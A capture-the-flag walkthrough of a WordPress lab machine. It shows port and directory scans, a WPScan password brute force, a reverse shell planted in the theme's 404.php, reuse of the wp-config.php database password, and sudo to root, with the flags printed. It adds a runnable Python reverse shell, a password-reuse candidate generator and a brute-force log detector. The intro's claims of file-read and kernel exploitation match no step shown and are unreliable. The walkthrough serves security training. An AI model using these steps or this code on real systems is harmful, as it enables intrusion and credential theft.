This machine provides an overview of attacks on web applications and how attackers can leverage Remote Arbitrary File Read vulnerabilities to gain full system privilege on the target server.
OS: Linux
Skills Learned: Pentesting WordPress, Remote Arbitrary File Read, Kernel exploitation
Port scanning found port 7777 running an HTTP service and port 22 (SSH).
┌──(rwx4m㉿Home)-[~/htr/findme]
└─$ nmap -sVC -T4 10.1.2.101 -oN port.scan
Nmap scan report for 10.1.2.101
Host is up (0.28s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 37:dc:66:a7:95:91:78:7b:90:7b:46:d9:ee:14:84:2f (RSA)
| 256 bc:38:b9:ac:b6:8d:82:bb:97:2f:a5:1f:e5:7a:0d:f6 (ECDSA)
|_ 256 36:8b:54:79:11:90:ad:a5:2c:5a:ed:2a:84:5b:de:0e (ED25519)
7777/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Nothing in here
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 61.42 seconds
Browsing to port 7777 shows nothing useful (the page title is "Nothing in here").
Using gobuster to look for directories on the target.
┌──(rwx4m㉿Home)-[~/htr/findme]
└─$ gobuster dir -u http://10.1.2.101:7777/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 50 -o gobuster.dir
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.1.2.101:7777/
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/services (Status: 301) [Size: 318] [--> http://10.1.2.101:7777/services/]
Progress: 5363 / 87665 (6.12%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 5363 / 87665 (6.12%)
===============================================================
Finished
===============================================================
After accessing /services, a WordPress site was found.
Here the post author is shown as ADMIN. Next I went to the login page (services/wp-login.php) and tried several default credentials, but they failed.
Since the username is known to be admin, the next step is a brute-force attack to find the correct password. Here I use WPScan. Several wordlists failed, but the wordlist bundled with John the Ripper (/usr/share/john/password.lst) succeeded.
┌──(rwx4m㉿Home)-[~/htr/findme]
└─$ wpscan --url http://10.1.2.101:7777/services --usernames admin --passwords /usr/share/john/password.lst
[!] Valid Combinations Found:
| Username: admin, Password: ChangeMe
Successfully logged in as admin.
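The brute force above leaves a very recognisable trace on the server side: a burst of POST requests to wp-login.php from one client, each answered with HTTP 200 (WordPress re-renders the form on a failed login), followed by a 302 redirect once a password is accepted. The following detection logic is an added example for this page, not part of the original writeup; the Apache access-log lines it runs over are constructed (the client IPs, timestamps and the WPScan user agent string are placeholders), and the threshold and window are assumptions, not values from the machine.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache "combined" log format; only the named groups are used.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Constructed sample, not a log from the target: 10.1.2.50 runs a dictionary
# attack against wp-login.php (six failed POSTs answered with 200, then the
# 302 WordPress sends on a successful login); 10.1.2.77 is an ordinary
# visitor who mistypes a password once.
SAMPLE_LOG = """\
10.1.2.50 - - [12/Mar/2024:10:00:00 +0000] "GET /services/wp-login.php HTTP/1.1" 200 4012 "-" "WPScan v3.8.25"
10.1.2.50 - - [12/Mar/2024:10:00:01 +0000] "POST /services/wp-login.php HTTP/1.1" 200 4012 "-" "WPScan v3.8.25"
10.1.2.50 - - [12/Mar/2024:10:00:01 +0000] "POST /services/wp-login.php HTTP/1.1" 200 4012 "-" "WPScan v3.8.25"
10.1.2.50 - - [12/Mar/2024:10:00:02 +0000] "POST /services/wp-login.php HTTP/1.1" 200 4012 "-" "WPScan v3.8.25"
10.1.2.50 - - [12/Mar/2024:10:00:02 +0000] "POST /services/wp-login.php HTTP/1.1" 200 4012 "-" "WPScan v3.8.25"
10.1.2.50 - - [12/Mar/2024:10:00:03 +0000] "POST /services/wp-login.php HTTP/1.1" 200 4012 "-" "WPScan v3.8.25"
10.1.2.50 - - [12/Mar/2024:10:00:03 +0000] "POST /services/wp-login.php HTTP/1.1" 200 4012 "-" "WPScan v3.8.25"
10.1.2.50 - - [12/Mar/2024:10:00:03 +0000] "POST /services/wp-login.php HTTP/1.1" 302 0 "-" "WPScan v3.8.25"
10.1.2.77 - - [12/Mar/2024:10:00:02 +0000] "GET /services/ HTTP/1.1" 200 25313 "-" "Mozilla/5.0"
10.1.2.77 - - [12/Mar/2024:10:00:09 +0000] "POST /services/wp-login.php HTTP/1.1" 200 4012 "-" "Mozilla/5.0"
"""


def parse_login_posts(log_text):
    """Return {ip: [(timestamp, status), ...]} for POSTs to wp-login.php.
    GETs (fetching the form) and other paths are ignored."""
    posts = defaultdict(list)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        if not m["path"].split("?", 1)[0].endswith("/wp-login.php"):
            continue
        ts = datetime.strptime(m["ts"], TS_FMT)
        posts[m["ip"]].append((ts, int(m["status"])))
    return posts


def detect_wp_bruteforce(log_text, threshold=5, window=timedelta(seconds=60)):
    """Flag clients with >= threshold failed logins (HTTP 200) inside any
    sliding window. A 302 in the same window means a password was accepted,
    so the alert is a likely compromise, not just an attempt."""
    alerts = {}
    for ip, events in parse_login_posts(log_text).items():
        events.sort()
        start = 0
        for i, (ts, _status) in enumerate(events):
            while ts - events[start][0] > window:
                start += 1
            in_window = events[start:i + 1]
            failures = sum(1 for _, s in in_window if s == 200)
            if failures < threshold:
                continue
            hit = alerts.setdefault(ip, {"failures": 0, "success_after_burst": False})
            hit["failures"] = max(hit["failures"], failures)
            hit["success_after_burst"] = hit["success_after_burst"] or any(
                s == 302 for _, s in in_window)
    return alerts


if __name__ == "__main__":
    for ip, hit in detect_wp_bruteforce(SAMPLE_LOG).items():
        print(ip, hit)
```

The status-code heuristic is specific to wp-login.php: a failed login is a 200 with the form re-rendered, a success is a 302 to wp-admin, so an IP whose burst of 200s ends in a 302 is the one to treat as an incident. The user agent is deliberately not used as a signal, since it is trivially changed.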
Using the theme editor, the theme's 404.php is replaced with a reverse shell script to create a backdoor:
Appearance -> Editor (/services/wp-admin/theme-editor.php)
With a listener waiting on the attacking host, requesting services/wp-content/themes/twentyseventeen/404.php executes the payload and a shell is obtained as www-data.
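The mechanism behind that step, as an added example rather than the author's payload (the writeup does not reproduce the PHP it used): a reverse shell connects back to the attacker's listener and hands /bin/sh the socket as stdin, stdout and stderr, so whatever the listener types becomes shell commands and the output returns over the same TCP connection. This Python stand-in plays both sides on 127.0.0.1 so it can be run offline; the port is chosen by the OS and the commands sent are placeholders.

```python
import socket
import subprocess
import threading


def connect_back(host, port):
    """Victim side: what the planted 404.php does when it is requested.
    On the target this runs as the web server user (www-data)."""
    sock = socket.create_connection((host, port))
    fd = sock.fileno()
    # Popen dup2()s the socket fd onto 0, 1 and 2 in the child, so the shell
    # reads commands from the network and writes results back to it.
    proc = subprocess.Popen(["/bin/sh"], stdin=fd, stdout=fd, stderr=fd)
    proc.wait()      # returns once the shell reads 'exit' or hits EOF
    sock.close()     # last reference to the socket: the listener sees EOF
    return proc.returncode


def run_exchange(commands):
    """Attacker side, the equivalent of `nc -lvnp PORT`: bind, accept the
    connect-back, send the commands followed by 'exit', collect all output."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))       # port 0: let the OS pick a free port
    srv.listen(1)
    port = srv.getsockname()[1]
    # The listener is bound before the victim connects, exactly as in the
    # writeup: start the listener first, then trigger 404.php.
    victim = threading.Thread(target=connect_back,
                              args=("127.0.0.1", port), daemon=True)
    victim.start()
    conn, _ = srv.accept()
    srv.close()
    conn.sendall(("\n".join(commands) + "\nexit\n").encode())
    chunks = []
    while True:
        data = conn.recv(4096)
        if not data:
            break
        chunks.append(data)
    conn.close()
    victim.join(timeout=10)
    return b"".join(chunks).decode(errors="replace")


if __name__ == "__main__":
    print(run_exchange(["id", "uname -a"]), end="")
```

On the target this is also the artifact to hunt for: a shell process owned by www-data whose parent is the web server and whose file descriptors 0, 1 and 2 are a TCP socket rather than a pipe or a tty.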
Reading /var/www/html/services/wp-config.php
gives the database password.
There are two local users, ubuntu and findme.
Trying the database password against user findme works, and we are logged in as findme.
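The step above is password reuse: wp-config.php has to be readable by the web server user, so any www-data shell can pull DB_PASSWORD out of it, and the only thing that decides whether that becomes a local account is whether the same password was used twice. The following is an added example, not code from the writeup: it extracts the define() constants from a wp-config.php and pairs the database password with every local account that has a login shell, producing the candidates to try against su or SSH. Both input files are constructed samples with placeholder values, not the target's real configuration.

```python
import re

# Constructed sample wp-config.php; the secrets are placeholders.
WP_CONFIG = """<?php
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'wpuser' );
define( 'DB_PASSWORD', 'S3cretDbPass!' );
define( 'DB_HOST', 'localhost' );
define( 'DB_CHARSET', 'utf8mb4' );
define("AUTH_KEY", "put your unique phrase here");
$table_prefix = 'wp_';
"""

# Constructed /etc/passwd with the two human accounts named in the writeup.
ETC_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
findme:x:1001:1001::/home/findme:/bin/bash
"""

# define('NAME', 'value'); with either quote style and optional whitespace.
# Values containing an escaped quote are not handled (they are rare in
# generated wp-config.php files).
DEFINE_RE = re.compile(
    r"""define\s*\(\s*(['"])(?P<name>[A-Z0-9_]+)\1\s*,\s*(['"])(?P<value>.*?)\3\s*\)\s*;"""
)


def wp_defines(config_text):
    """All define() constants in a wp-config.php as {NAME: value}."""
    return {m["name"]: m["value"] for m in DEFINE_RE.finditer(config_text)}


def db_credentials(config_text):
    """The database connection parameters an attacker reads first."""
    d = wp_defines(config_text)
    return {key: d.get(const) for key, const in
            (("host", "DB_HOST"), ("name", "DB_NAME"),
             ("user", "DB_USER"), ("password", "DB_PASSWORD"))}


def login_users(passwd_text):
    """Local accounts with a real login shell: the reuse candidates."""
    users = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:
            continue
        if fields[6].endswith(("nologin", "/false")):
            continue
        users.append(fields[0])
    return users


def reuse_candidates(config_text, passwd_text):
    """(user, password) pairs to try: the DB password against every
    login-capable account, root included (su accepts it too)."""
    password = db_credentials(config_text)["password"]
    if password is None:
        return []
    return [(user, password) for user in login_users(passwd_text)]


if __name__ == "__main__":
    for user, password in reuse_candidates(WP_CONFIG, ETC_PASSWD):
        print(f"try: su {user}  (password from wp-config.php: {password!r})")
```

The hardening lesson follows directly: wp-config.php being readable by www-data cannot be avoided, so the database password must be unique to the database, and the DB_USER should not exist as an OS account at all.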
Getting the user flag.
findme@findme:~$ ls
ls
user.txt
findme@findme:~$ cat user.txt
cat user.txt
da0865f3f5641a0953b50b93b6fb479b
Checking the sudo privileges of user findme.
findme@findme:~$ sudo -l
sudo -l
[sudo] password for findme: passwordnyarahasia
Matching Defaults entries for findme on findme:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User findme may run the following commands on findme:
(ALL : ALL) ALL
This shows that user findme has unrestricted sudo rights: (ALL : ALL) ALL means any command may be run as any user and any group, root included.
With that, sudo su gives a root shell and the root flag.
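Reading sudo -l output by eye is fine for one grant line, but the format also carries run-as groups, tags such as NOPASSWD: and comma-separated command lists, and the difference between those forms is the difference between "full root" and "one binary". The parser below is an added example, not part of the writeup; its sample input copies the structure of the output above, with the unrestricted grant first and two constructed restricted entries added to show what the parser must distinguish.

```python
import re

# Constructed `sudo -l` output: entry one is the unrestricted grant seen on
# the machine; the other two are added to show the restricted forms.
SAMPLE_SUDO_L = """\
Matching Defaults entries for findme on findme:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User findme may run the following commands on findme:
    (ALL : ALL) ALL
    (root) NOPASSWD: /usr/bin/find, /usr/bin/less
    (www-data) /usr/bin/php
"""

# "(runas_user[ : runas_group]) [TAG: ...] cmd[, cmd...]"
ENTRY_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+?)\s*$"
)


def parse_sudo_l(text):
    """One dict per grant line after the 'may run the following commands'
    header: run-as user and group, tags, and the list of commands."""
    entries = []
    in_grants = False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_grants = True
            continue
        if not in_grants or not line.strip():
            continue
        m = ENTRY_RE.match(line)
        if not m:
            continue
        runas_user, _, runas_group = m["runas"].partition(":")
        entries.append({
            "runas_user": runas_user.strip(),
            "runas_group": runas_group.strip() or None,
            "tags": [t.rstrip(":") for t in m["tags"].split()],
            "commands": [c.strip() for c in m["cmds"].split(",")],
        })
    return entries


def grants_full_root(entries):
    """True when some entry allows ALL commands as root (or as ALL users),
    which is the (ALL : ALL) ALL case: `sudo su` or `sudo -i` ends it."""
    return any("ALL" in e["commands"] and e["runas_user"] in ("ALL", "root")
               for e in entries)


def describe(entries):
    """Human-readable triage of each grant."""
    lines = []
    for e in entries:
        auth = "no password" if "NOPASSWD" in e["tags"] else "password required"
        lines.append(f"as {e['runas_user']}: {', '.join(e['commands'])} ({auth})")
    return lines


if __name__ == "__main__":
    parsed = parse_sudo_l(SAMPLE_SUDO_L)
    print("\n".join(describe(parsed)))
    print("full root:", grants_full_root(parsed))
```

Only the first entry is full root; the other two would need a path through the specific binary (a shell escape in the allowed program, for instance), which is why a parser that keeps the command list separate from the run-as target is more useful than a plain grep for "ALL".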
findme@findme:~$ sudo su
sudo su
root@findme:/home/findme# cd
cd
root@findme:~# ls
ls
root.txt
root@findme:~# cat root.txt
cat root.txt
39f40460578c23a5eb15d36b796a1631